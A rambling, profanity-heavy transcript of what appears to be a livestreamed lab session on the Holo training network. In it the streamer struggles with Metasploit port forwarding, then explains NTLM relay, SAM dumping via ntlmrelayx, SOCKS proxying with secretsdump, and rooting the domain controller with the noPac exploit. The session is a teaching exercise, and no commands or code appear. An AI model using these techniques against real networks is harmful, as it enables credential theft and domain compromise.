like the lab quit. Okay. I'm so done with this stupid garbage. I am so done. I am so done. Okay, are we good now? I would give literally any amount of money in the world for this to just fucking work. Great, now we can't even RDP in. Okay, well, I don't know what's happening there. Great. I don't know what's happening. Now we can't even RDP in. This is an absolute rancid piece of garbage of a lab. This sucks ass. Don't do Holo. I 0 out of 10. This sucks. Don't do it. Like, this is a piece of garbage. Now we can't connect to the fucking machine. Okay. Yeah, we can't even connect to the box now. Like, I can't do anything. This is unbelievable. Like, how poor this is. Yep. Like, the box is just down now. I guess the lab is the lab shutting down? I don't know. Don't know what's happening. The network is still running. This is... The network is still running. Okay. All right, then. Cool. Good lab. Well done. Who's responsible for this rancid piece of garbage? Squooky and Cryilic. You make great boxes. This is not one of them. Holy crap. This is a piece of trash. Okay, so it just stops communicating. That's good. Okay, well. Can we connect to the DC? Alrighty, I'll tell you what we're going to do instead. Because I am finished with this garbage. I'm not doing NTLM relay anymore. This thing is a piece of garbage. I'm not playing with it anymore. Now, we had a problem with this before. I'm trying to remember what the problem was. Yeah, we get that error. Okay, we'll try this. Apparently this one worked for a viewer. So we'll just do this one. It is incredible how fucking poor this lab is. I am so frustrated. Just absolute misery the whole fucking time. Holy shit. One tack. Maybe use LDAP doesn't work. Connection refused. Yippee. Alright, we'll try it without LDAP. Wait, so it tries LDAP. Like, is this just... Is my port forward failing? Oh my god. For fuck's sake. Okay. What is the stupid IP of this piece of garbage? 200 dot... 151.30. Is my socks proxy just not working now? Okay, Nmap, please. I didn't tell you to scan port 80. I understand that you feel like you have to do that every time. Oh. I treated it like a netcat command. I'm just tired. 445. We still got to scan port 80 first. Great. Thanks. I enjoy waiting for 15 minutes for it to scan port 80. When I know it's not open. .151 is not the correct IP address. That would be why it's not working. It's 137. That would be why it's not working. And I've used the first version of the command. There we go. Now it's doing its thing. And I bet you it won't work now. I bet you it won't fucking work now, too. God fucking damn it. I bet you it won't fucking work now. Because I get that every time. It's just going to fail out again. Or it's going to fail out for a different reason. Oh, nope. Holy shit, it actually did work. It actually did work. There we go. Totally NTLM relayed and definitely didn't use no pack. Okay, we get it. We're on the DC. Good work, team. Good work. Good NTLM relay, team. Nice. And there's stupid root.txt. Totally NTLM relayed the whole time. Nice work, team. Good work. We did it. Wow, NTLM relay. Wow. I promise NTLM relay works much better in the real world when you're not using Metasploit and you're using a real piece of software, like you're using a real software like Cobalt Strike. Good work, team. We did it. Yeah, wow, NTLM relay, yippee. Okay. Mr. Crumbs with the 8 months. Welcome back to the All Has Red team, my friend. Thanks for sitting through the Malding. Developer with the 10 total months. Thank you so much once again. God, this was fucking miserable. Badaflaka again, thank you for the 9 months. Susfaris with the 16, thank you so much. I am a Malder, that is true.
Well done, L4Z Draco.
69 Tiggle Biddies, thank you so much, Orbital Gun. Mikhailovich, Centauri 7, This Is Bad RNG, Crypto Clubber, Tashi Ronagata, thank you for the follows. Pelmic 93, Liberty Hunden, and Mark Aureli, thank you for the follows. Cthulhu Fountain to all of you. Orbital Gun, thanks again for the 69 Tiggle Biddies. Alright, let's do this right there. Alright. I'm sorry we couldn't get NTLM relay to work properly. It technically did work. That's why we got the SAM file that one time. It technically did work. That's why we got the SAM file. So technically, chat, NTLM relay did work. Okay? ideally what you would have seen there is that we would have used NTLM relay to set up a SOCKS proxy, and then that SOCKS proxy can be used within that SMB session to authenticate as the user of that SMB session. So we could have secrets dumped through that. Hopefully that makes sense. We could have used secretsdump.py through that SOCKS proxy. Does that make any sense? But technically it did work the first time we did it, and then we started having all those connectivity issues. I still don't know what the hell was going on. I think it's MSF. Lots of people have problems. Yeah, because it's garbage. Don't put it in your boxes. NTLM, he wanted to put it in because it's a very realistic attack. NTLM relay has been around for a long time, and it's used for it's a core attack that you'll use on internal networks. On internal network penetration tests, NTLM relay is an absolutely core tool. I use it all the time. Can you explain NTLM relay? So I would go back and watch the VOD before I descended into Eldritch Madness, because I go into an in-depth explanation of what NTLM relay is. At the moment, hopefully this helps. We're good, right? This makes total sense. We're good, right? This makes I don't have to go back through this again, right? I'm kidding. So essentially this is what NTLM looks like right here. This is what an NTLM authentication looks like. We are inserting ourselves into the middle of that authentication process and subverting it toward to our own ends. Okay? All right? That's basically what NTLM relay is. The struggle in this situation was that doing NTLM relay from a compromised machine and not from your Kali machine is a gigantic pain in the ass. And it's a gigantic pain in the ass because you've got SMB that's always listening at port 445. So you need some way of redirecting the traffic so it can actually get to you. That was the issue we were seeing. Not the actual issues we were having was not with this process. This process is handled by NTLM Relay X. The problem we were having is that Metasploit's port forwarding is garbage. Like, it's just trash. It was just not working. So we were not able to properly redirect traffic consistently, which really sucks. How does it work on a domain controller? I know it doesn't work with SMB signing turned on. In this case, SMB signing was turned off on the domain controller. That's why it worked on the domain controller. And technically, again, it did work. The default behavior of NTLM Relay X upon connecting to a target is to dump the SAM file, which it did do. We did get the SAM file, but it did not allow local authentication. Local authentication seems to have been disabled, so we were not allowed to authenticate as the local administrator account. So Sag there. But technically, the NTLM relay did work before we started having all those fucking shitty connection issues. Does anybody have any questions? I'm happy to explain some more if I need to. I'm sorry about that, Fat Mulder. I was really frustrated at the end. I really wanted this thing to be done today. Today, we are considering it done. I'm not going back and doing this again. The NTLM relay section really sucked. And I guarantee you it's because it's failing. The Meterpreter is just really shit. We wouldn't have this problem if it was Cobalt Strike. Cobalt Strike, I don't think I've ever had problems with Cobalt Strike's proxies. Honestly. Hey, Husky, if you're still in chat, have you ever had a problem with Cobalt Strike's port forwarding and proxies? Like, Cobalt Strike's port forwarding and proxies is worthy of its price. It's so good. I'm newer with proxy chains, so I've only gotten a couple of scripts to run successfully. What limitations are there with scripts that can be used with proxy chains? Really, none. Proxy chains takes care of all the network connections. It hooks into all the network connections and redirects them. It's probably Bloodhound. My guess is you got the Bloodhound syntax with the Python Bloodhound syntax is very, very, very particular. It's very picky. So I would say your problem is probably not with proxy chains. It's probably with your Bloodhound syntax. I have problems with the Bloodhound syntax all the time. So yeah. Do the glasses help? They do. But they were not, their power level was not sufficient to save us today. In the end, what we eventually used to root this box, to root the domain controller, was a very recent exploit called NoPack, which it was virtually guaranteed to be vulnerable to because the lab was made prior to... the lab was created prior to that exploit being released. So they would have had to patch the lab, and they're just not doing that. So... Alright, I don't know where Star is. She usually doesn't like coming in here because I talk loud when I'm on the stream. But I'll say hi to Star for you, Helen of Tor. We're gonna raid Dino Dan. I feel like I need some time to chill out and watch some and learn about some fucking dinosaurs. I'm still wound up. Guys, I'm really sorry. I do try to show you like the hard stuff. I try to take on the hard challenges. Metasploit was just not cooperating tonight. I guarantee you we wouldn't have had those problems if we were using Cobalt Strike to do the port forwarding. But it looks like Metasploit's port forwarding is just bad. It's just not good. So I do apologize for the frustration. I wasn't mad at any of you. I hope you guys learned. Yeah, it's not only the fact that the shit is not working, it's the fact that I'm live in front of you guys, and I've been working on Holo for, like, we've been whittling our way through Holo for goddamn weeks, and it just needed to get done. I needed it done. Like, I needed Holo out of the way. So, I'm sorry it didn't really go the way that I wanted it to. Hopefully you learned about NTLM Relay anyway. It did work. It didn't work the way that I would have wanted. I wanted to get that SOX proxy working. It would have been more impressive that way. But all right, go to bed tonight knowing a little bit more than you did yesterday. Tell Dino Dan I said hi. I'll see you guys again when the stars are right. Have a good night, day, or whatever time it is, wherever you are. Get vaccinated. Stay safe. Love you all.